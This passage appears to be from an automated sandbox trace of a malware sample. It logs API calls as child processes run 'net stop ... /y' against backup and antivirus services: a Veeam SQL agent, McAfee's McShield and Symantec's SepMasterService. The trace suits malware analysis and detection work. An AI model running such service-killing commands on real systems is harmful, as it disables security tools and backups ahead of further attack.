Arguments=0xf49dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0203.509] GetFileType (hFile=0x26c) returned 0x3 [0203.509] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6d6298 [0203.509] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6d6298, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0203.509] WriteFile (in: hFile=0x26c, lpBuffer=0x6d6298, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2df89c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df89c, lpOverlapped=0x0) returned 0 [0203.509] LocalFree (hMem=0x6d6298) returned 0x0 [0203.509] GetFileType (hFile=0x26c) returned 0x3 [0203.509] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d6298 [0203.509] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6d6298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nm", lpUsedDefaultChar=0x0) returned 2 [0203.509] WriteFile (in: hFile=0x26c, lpBuffer=0x6d6298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df89c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df89c, lpOverlapped=0x0) returned 0 [0203.509] LocalFree (hMem=0x6d6298) returned 0x0 [0203.509] NetApiBufferFree (Buffer=0x6d1c90) returned 0x0 [0203.510] NetApiBufferFree (Buffer=0x6d1ca8) returned 0x0 [0203.510] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0203.510] exit (_Code=2) Process: id = "206" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6b8c7000" os_pid = "0x46c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop McShield /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 379 os_tid = 0x7a0 Process: id = "207" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x73eae000" os_pid = "0x358" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "206" os_parent_pid = "0x46c" cmd_line = "C:\\Windows\\system32\\net1 stop McShield /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 380 os_tid = 0x7d4 [0203.651] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fcb4 | out: lpSystemTimeAsFileTime=0x20fcb4*(dwLowDateTime=0x42938760, dwHighDateTime=0x1d57a87)) [0203.651] GetCurrentProcessId () returned 0x358 [0203.651] GetCurrentThreadId () returned 0x7d4 [0203.651] GetTickCount () returned 0x116c89d [0203.651] QueryPerformanceCounter (in: lpPerformanceCount=0x20fcac | out: lpPerformanceCount=0x20fcac*=32393614915) returned 1 [0203.652] GetModuleHandleA (lpModuleName=0x0) returned 0x3f0000 [0203.652] __set_app_type (_Type=0x1) [0203.652] __p__fmode () returned 0x74eb31f4 [0203.652] __p__commode () returned 0x74eb31fc [0203.652] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3fffe6) returned 0x0 [0203.652] __getmainargs (in: _Argc=0x409064, _Argv=0x40906c, _Env=0x409068, _DoWildCard=0, _StartInfo=0x409024 | out: _Argc=0x409064, _Argv=0x40906c, _Env=0x409068) returned 0 [0203.652] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.652] GetConsoleOutputCP () returned 0x1b5 [0203.652] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x409080 | out: lpCPInfo=0x409080) returned 1 [0203.653] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.656] sprintf_s (in: _DstBuf=0x20fc6c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0203.656] setlocale (category=0, locale=".437") returned="English_United States.437" [0203.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0203.658] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0203.658] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McShield /y" [0203.658] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fa38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0203.658] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x64) returned 0x4a3c00 [0203.659] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0203.659] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fc3c | out: Buffer=0x20fc3c*=0x4a1c60) returned 0x0 [0203.659] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fc3c | out: Buffer=0x20fc3c*=0x4a1c78) returned 0x0 [0203.659] _fileno (_File=0x74eb2900) returned -2 [0203.659] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0203.659] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0203.659] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0203.659] _wcsicmp (_String1="config", _String2="stop") returned -16 [0203.659] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0203.659] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0203.659] _wcsicmp (_String1="file", _String2="stop") returned -13 [0203.659] _wcsicmp (_String1="files", _String2="stop") returned -13 [0203.659] _wcsicmp (_String1="group", _String2="stop") returned -12 [0203.659] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0203.659] _wcsicmp (_String1="help", _String2="stop") returned -11 [0203.659] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0203.659] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0203.659] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0203.659] _wcsicmp (_String1="session", _String2="stop") returned -15 [0203.659] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0203.659] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0203.659] _wcsicmp (_String1="share", _String2="stop") returned -12 [0203.659] _wcsicmp (_String1="start", _String2="stop") returned -14 [0203.659] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0203.660] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0203.660] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0203.660] _wcsicmp (_String1="accounts", _String2="McShield") returned -12 [0203.660] _wcsicmp (_String1="computer", _String2="McShield") returned -10 [0203.660] _wcsicmp (_String1="config", _String2="McShield") returned -10 [0203.660] _wcsicmp (_String1="continue", _String2="McShield") returned -10 [0203.660] _wcsicmp (_String1="cont", _String2="McShield") returned -10 [0203.660] _wcsicmp (_String1="file", _String2="McShield") returned -7 [0203.660] _wcsicmp (_String1="files", _String2="McShield") returned -7 [0203.660] _wcsicmp (_String1="group", _String2="McShield") returned -6 [0203.660] _wcsicmp (_String1="groups", _String2="McShield") returned -6 [0203.660] _wcsicmp (_String1="help", _String2="McShield") returned -5 [0203.660] _wcsicmp (_String1="helpmsg", _String2="McShield") returned -5 [0203.660] _wcsicmp (_String1="localgroup", _String2="McShield") returned -1 [0203.660] _wcsicmp (_String1="pause", _String2="McShield") returned 3 [0203.660] _wcsicmp (_String1="session", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="sessions", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="sess", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="share", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="start", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="stats", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="statistics", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="stop", _String2="McShield") returned 6 [0203.660] _wcsicmp (_String1="time", _String2="McShield") returned 7 [0203.660] _wcsicmp (_String1="user", _String2="McShield") returned 8 [0203.660] _wcsicmp (_String1="users", _String2="McShield") returned 8 [0203.660] _wcsicmp (_String1="msg", _String2="McShield") returned 16 [0203.660] _wcsicmp (_String1="messenger", _String2="McShield") returned 2 [0203.660] _wcsicmp (_String1="receiver", _String2="McShield") returned 5 [0203.660] _wcsicmp (_String1="rcv", _String2="McShield") returned 5 [0203.660] _wcsicmp (_String1="netpopup", _String2="McShield") returned 1 [0203.661] _wcsicmp (_String1="redirector", _String2="McShield") returned 5 [0203.661] _wcsicmp (_String1="redir", _String2="McShield") returned 5 [0203.661] _wcsicmp (_String1="rdr", _String2="McShield") returned 5 [0203.661] _wcsicmp (_String1="workstation", _String2="McShield") returned 10 [0203.661] _wcsicmp (_String1="work", _String2="McShield") returned 10 [0203.661] _wcsicmp (_String1="wksta", _String2="McShield") returned 10 [0203.661] _wcsicmp (_String1="prdr", _String2="McShield") returned 3 [0203.661] _wcsicmp (_String1="devrdr", _String2="McShield") returned -9 [0203.661] _wcsicmp (_String1="lanmanworkstation", _String2="McShield") returned -1 [0203.661] _wcsicmp (_String1="server", _String2="McShield") returned 6 [0203.661] _wcsicmp (_String1="svr", _String2="McShield") returned 6 [0203.661] _wcsicmp (_String1="srv", _String2="McShield") returned 6 [0203.661] _wcsicmp (_String1="lanmanserver", _String2="McShield") returned -1 [0203.661] _wcsicmp (_String1="alerter", _String2="McShield") returned -12 [0203.661] _wcsicmp (_String1="netlogon", _String2="McShield") returned 1 [0203.661] _wcsupr (in: _String="McShield" | out: _String="MCSHIELD") returned="MCSHIELD" [0203.661] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4a54b8 [0203.665] GetServiceKeyNameW (in: hSCManager=0x4a54b8, lpDisplayName="MCSHIELD", lpServiceName=0x40aaf0, lpcchBuffer=0x20fbd8 | out: lpServiceName="", lpcchBuffer=0x20fbd8) returned 0 [0203.666] _wcsicmp (_String1="msg", _String2="MCSHIELD") returned 16 [0203.666] _wcsicmp (_String1="messenger", _String2="MCSHIELD") returned 2 [0203.666] _wcsicmp (_String1="receiver", _String2="MCSHIELD") returned 5 [0203.666] _wcsicmp (_String1="rcv", _String2="MCSHIELD") returned 5 [0203.666] _wcsicmp (_String1="redirector", _String2="MCSHIELD") returned 5 [0203.666] _wcsicmp (_String1="redir", _String2="MCSHIELD") returned 5 [0203.666] _wcsicmp (_String1="rdr", _String2="MCSHIELD") returned 5 [0203.666] _wcsicmp (_String1="workstation", _String2="MCSHIELD") returned 10 [0203.666] _wcsicmp (_String1="work", _String2="MCSHIELD") returned 10 [0203.666] _wcsicmp (_String1="wksta", _String2="MCSHIELD") returned 10 [0203.666] _wcsicmp (_String1="prdr", _String2="MCSHIELD") returned 3 [0203.666] _wcsicmp (_String1="devrdr", _String2="MCSHIELD") returned -9 [0203.666] _wcsicmp (_String1="lanmanworkstation", _String2="MCSHIELD") returned -1 [0203.666] _wcsicmp (_String1="server", _String2="MCSHIELD") returned 6 [0203.666] _wcsicmp (_String1="svr", _String2="MCSHIELD") returned 6 [0203.666] _wcsicmp (_String1="srv", _String2="MCSHIELD") returned 6 [0203.666] _wcsicmp (_String1="lanmanserver", _String2="MCSHIELD") returned -1 [0203.666] _wcsicmp (_String1="alerter", _String2="MCSHIELD") returned -12 [0203.666] _wcsicmp (_String1="netlogon", _String2="MCSHIELD") returned 1 [0203.666] NetServiceControl (in: servername=0x0, service="MCSHIELD", opcode=0x0, arg=0x0, bufptr=0x20fbd4 | out: bufptr=0x20fbd4) returned 0x889 [0203.667] wcscpy_s (in: _Destination=0x40a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0203.667] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0203.668] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x40b338, nSize=0x800, Arguments=0x409dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0203.669] GetFileType (hFile=0x26c) returned 0x3 [0203.669] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4a3fe8 [0203.669] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4a3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0203.669] WriteFile (in: hFile=0x26c, lpBuffer=0x4a3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x20fb14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20fb14, lpOverlapped=0x0) returned 0 [0203.669] LocalFree (hMem=0x4a3fe8) returned 0x0 [0203.669] GetFileType (hFile=0x26c) returned 0x3 [0203.669] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4a6290 [0203.669] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4a6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nJ", lpUsedDefaultChar=0x0) returned 2 [0203.669] WriteFile (in: hFile=0x26c, lpBuffer=0x4a6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20fb14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20fb14, lpOverlapped=0x0) returned 0 [0203.669] LocalFree (hMem=0x4a6290) returned 0x0 [0203.669] _ultow (in: _Dest=0x889, _Radix=2161476 | out: _Dest=0x889) returned="2185" [0203.669] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x40b338, nSize=0x800, Arguments=0x409dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0203.670] GetFileType (hFile=0x26c) returned 0x3 [0203.670] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4a6290 [0203.670] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4a6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0203.670] WriteFile (in: hFile=0x26c, lpBuffer=0x4a6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x20fb20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20fb20, lpOverlapped=0x0) returned 0 [0203.670] LocalFree (hMem=0x4a6290) returned 0x0 [0203.670] GetFileType (hFile=0x26c) returned 0x3 [0203.670] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4a6290 [0203.670] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4a6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nJ", lpUsedDefaultChar=0x0) returned 2 [0203.670] WriteFile (in: hFile=0x26c, lpBuffer=0x4a6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20fb20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20fb20, lpOverlapped=0x0) returned 0 [0203.670] LocalFree (hMem=0x4a6290) returned 0x0 [0203.670] NetApiBufferFree (Buffer=0x4a1c60) returned 0x0 [0203.671] NetApiBufferFree (Buffer=0x4a1c78) returned 0x0 [0203.671] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McShield /y" [0203.671] exit (_Code=2) Process: id = "208" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x255cc000" os_pid = "0x6ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SepMasterService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 381 os_tid = 0x7ac Process: id = "209" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6a96f000" os_pid = "0x2ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "208" os_parent_pid = "0x6ac" cmd_line = "C:\\Windows\\system32\\net1 stop SepMasterService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 382 os_tid = 0x640 [0203.820] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfb70 | out: lpSystemTimeAsFileTime=0xdfb70*(dwLowDateTime=0x42adb680, dwHighDateTime=0x1d57a87)) [0203.820] GetCurrentProcessId () returned 0x2ac [0203.820] GetCurrentThreadId () returned 0x640 [0203.820] GetTickCount () returned 0x116c948 [0203.820] QueryPerformanceCounter (in: lpPerformanceCount=0xdfb68 | out: lpPerformanceCount=0xdfb68*=32410489982) returned 1 [0203.820] GetModuleHandleA (lpModuleName=0x0) returned 0x690000 [0203.821] __set_app_type (_Type=0x1) [0203.821] __p__fmode () returned 0x74eb31f4 [0203.821] __p__commode () returned 0x74eb31fc [0203.821] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x69ffe6) returned 0x0 [0203.821] __getmainargs (in: _Argc=0x6a9064, _Argv=0x6a906c, _Env=0x6a9068, _DoWildCard=0, _StartInfo=0x6a9024 | out: _Argc=0x6a9064, _Argv=0x6a906c, _Env=0x6a9068) returned 0 [0203.821] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.821] GetConsoleOutputCP () returned 0x1b5 [0203.821] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x6a9080 | out: lpCPInfo=0x6a9080) returned 1 [0203.821] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.824] sprintf_s (in: _DstBuf=0xdfb28, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0203.824] setlocale (category=0, locale=".437") returned="English_United States.437" [0203.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0203.826] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0203.826] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SepMasterService /y" [0203.826] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdf8f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0203.826] RtlAllocateHeap (HeapHandle=0x880000, Flags=0x0, Size=0x74) returned 0x88f788 [0203.827] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0203.827] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfaf8 | out: Buffer=0xdfaf8*=0x891c78) returned 0x0 [0203.827] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfaf8 | out: Buffer=0xdfaf8*=0x891c90) returned 0x0 [0203.827] _fileno (_File=0x74eb2900) returned -2 [0203.827] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0203.827] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0203.827] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0203.827] _wcsicmp (_String1="config", _String2="stop") returned -16 [0203.827] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0203.827] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0203.827] _wcsicmp (_String1="file", _String2="stop") returned -13 [0203.827] _wcsicmp (_String1="files", _String2="stop") returned -13 [0203.827] _wcsicmp (_String1="group", _String2="stop") returned -12 [0203.827] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0203.827] _wcsicmp (_String1="help", _String2="stop") returned -11 [0203.827] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0203.827] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0203.827] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0203.828] _wcsicmp (_String1="session", _String2="stop") returned -15 [0203.828] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0203.828] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0203.828] _wcsicmp (_String1="share", _String2="stop") returned -12 [0203.828] _wcsicmp (_String1="start", _String2="stop") returned -14 [0203.828] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0203.828] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0203.828] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0203.828] _wcsicmp (_String1="accounts", _String2="SepMasterService") returned -18 [0203.828] _wcsicmp (_String1="computer", _String2="SepMasterService") returned -16 [0203.828] _wcsicmp (_String1="config", _String2="SepMasterService") returned -16 [0203.828] _wcsicmp (_String1="continue", _String2="SepMasterService") returned -16 [0203.828] _wcsicmp (_String1="cont", _String2="SepMasterService") returned -16 [0203.828] _wcsicmp (_String1="file", _String2="SepMasterService") returned -13 [0203.828] _wcsicmp (_String1="files", _String2="SepMasterService") returned -13 [0203.828] _wcsicmp (_String1="group", _String2="SepMasterService") returned -12 [0203.828] _wcsicmp (_String1="groups", _String2="SepMasterService") returned -12 [0203.828] _wcsicmp (_String1="help", _String2="SepMasterService") returned -11 [0203.828] _wcsicmp (_String1="helpmsg", _String2="SepMasterService") returned -11 [0203.828] _wcsicmp (_String1="localgroup", _String2="SepMasterService") returned -7 [0203.828] _wcsicmp (_String1="pause", _String2="SepMasterService") returned -3 [0203.828] _wcsicmp (_String1="session", _String2="SepMasterService") returned 3 [0203.828] _wcsicmp (_String1="sessions", _String2="SepMasterService") returned 3 [0203.828] _wcsicmp (_String1="sess", _String2="SepMasterService") returned 3 [0203.828] _wcsicmp (_String1="share", _String2="SepMasterService") returned 3 [0203.828] _wcsicmp (_String1="start", _String2="SepMasterService") returned 15 [0203.828] _wcsicmp (_String1="stats", _String2="SepMasterService") returned 15 [0203.828] _wcsicmp (_String1="statistics", _String2="SepMasterService") returned 15 [0203.828] _wcsicmp (_String1="stop", _String2="SepMasterService") returned 15 [0203.828] _wcsicmp (_String1="time", _String2="SepMasterService") returned 1 [0203.828] _wcsicmp (_String1="user", _String2="SepMasterService") returned 2 [0203.828] _wcsicmp (_String1="users", _String2="SepMasterService") returned 2 [0203.828] _wcsicmp (_String1="msg", _String2="SepMasterService") returned -6 [0203.828] _wcsicmp (_String1="messenger", _String2="SepMasterService") returned -6 [0203.828] _wcsicmp (_String1="receiver", _String2="SepMasterService") returned -1 [0203.828] _wcsicmp (_String1="rcv", _String2="SepMasterService") returned -1 [0203.828] _wcsicmp (_String1="netpopup", _String2="SepMasterService") returned -5 [0203.828] _wcsicmp (_String1="redirector", _String2="SepMasterService") returned -1 [0203.829] _wcsicmp (_String1="redir", _String2="SepMasterService") returned -1 [0203.829] _wcsicmp (_String1="rdr", _String2="SepMasterService") returned -1 [0203.829] _wcsicmp (_String1="workstation", _String2="SepMasterService") returned 4 [0203.829] _wcsicmp (_String1="work", _String2="SepMasterService") returned 4 [0203.829] _wcsicmp (_String1="wksta", _String2="SepMasterService") returned 4 [0203.829] _wcsicmp (_String1="prdr", _String2="SepMasterService") returned -3 [0203.829] _wcsicmp (_String1="devrdr", _String2="SepMasterService") returned -15 [0203.829] _wcsicmp (_String1="lanmanworkstation", _String2="SepMasterService") returned -7 [0203.829] _wcsicmp (_String1="server", _String2="SepMasterService") returned 2 [0203.829] _wcsicmp (_String1="svr", _String2="SepMasterService") returned 17 [0203.829] _wcsicmp (_String1="srv", _String2="SepMasterService") returned 13 [0203.829] _wcsicmp (_String1="lanmanserver", _String2="SepMasterService") returned -7 [0203.829] _wcsicmp (_String1="alerter", _String2="SepMasterService") returned -18 [0203.829] _wcsicmp (_String1="netlogon", _String2="SepMasterService") returned -5 [0203.829] _wcsupr (in: _String="SepMasterService" | out: _String="SEPMASTERSERVICE") returned="SEPMASTERSERVICE" [0203.829] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x895460 [0203.832] GetServiceKeyNameW (in: hSCManager=0x895460, lpDisplayName="SEPMASTERSERVICE", lpServiceName=0x6aaaf0, lpcchBuffer=0xdfa94 | out: lpServiceName="", lpcchBuffer=0xdfa94) returned 0 [0203.832] _wcsicmp (_String1="msg", _String2="SEPMASTERSERVICE") returned -6 [0203.832] _wcsicmp (_String1="messenger", _String2="SEPMASTERSERVICE") returned -6 [0203.832] _wcsicmp (_String1="receiver", _String2="SEPMASTERSERVICE") returned -1 [0203.832] _wcsicmp (_String1="rcv", _String2="SEPMASTERSERVICE") returned -1 [0203.832] _wcsicmp (_String1="redirector", _String2="SEPMASTERSERVICE") returned -1 [0203.832] _wcsicmp (_String1="redir", _String2="SEPMASTERSERVICE") returned -1 [0203.832] _wcsicmp (_String1="rdr", _String2="SEPMASTERSERVICE") returned -1 [0203.832] _wcsicmp (_String1="workstation", _String2="SEPMASTERSERVICE") returned 4 [0203.832] _wcsicmp (_String1="work", _String2="SEPMASTERSERVICE") returned 4 [0203.832] _wcsicmp (_String1="wksta", _String2="SEPMASTERSERVICE") returned 4 [0203.832] _wcsicmp (_String1="prdr", _String2="SEPMASTERSERVICE") returned -3 [0203.832] _wcsicmp (_String1="devrdr", _String2="SEPMASTERSERVICE") returned -15 [0203.832] _wcsicmp (_String1="lanmanworkstation", _String2="SEPMASTERSERVICE") returned -7 [0203.832] _wcsicmp (_String1="server", _String2="SEPMASTERSERVICE") returned 2 [0203.832] _wcsicmp (_String1="svr", _String2="SEPMASTERSERVICE") returned 17 [0203.833] _wcsicmp (_String1="srv", _String2="SEPMASTERSERVICE") returned 13 [0203.833] _wcsicmp (_String1="lanmanserver", _String2="SEPMASTERSERVICE") returned -7 [0203.833] _wcsicmp (_String1="alerter", _String2="SEPMASTERSERVICE") returned -18 [0203.833] _wcsicmp (_String1="netlogon", _String2="SEPMASTERSERVICE") returned -5 [0203.833] NetServiceControl (in: servername=0x0, service="SEPMASTERSERVICE", opcode=0x0, arg=0x0, bufptr=0xdfa90 | out: bufptr=0xdfa90) returned 0x889 [0203.834] wcscpy_s (in: _Destination=0x6aa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0203.834] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0203.834] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x6ab338, nSize=0x800, Arguments=0x6a9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0203.835] GetFileType (hFile=0x26c) returned 0x3 [0203.835] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x893f90 [0203.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x893f90, 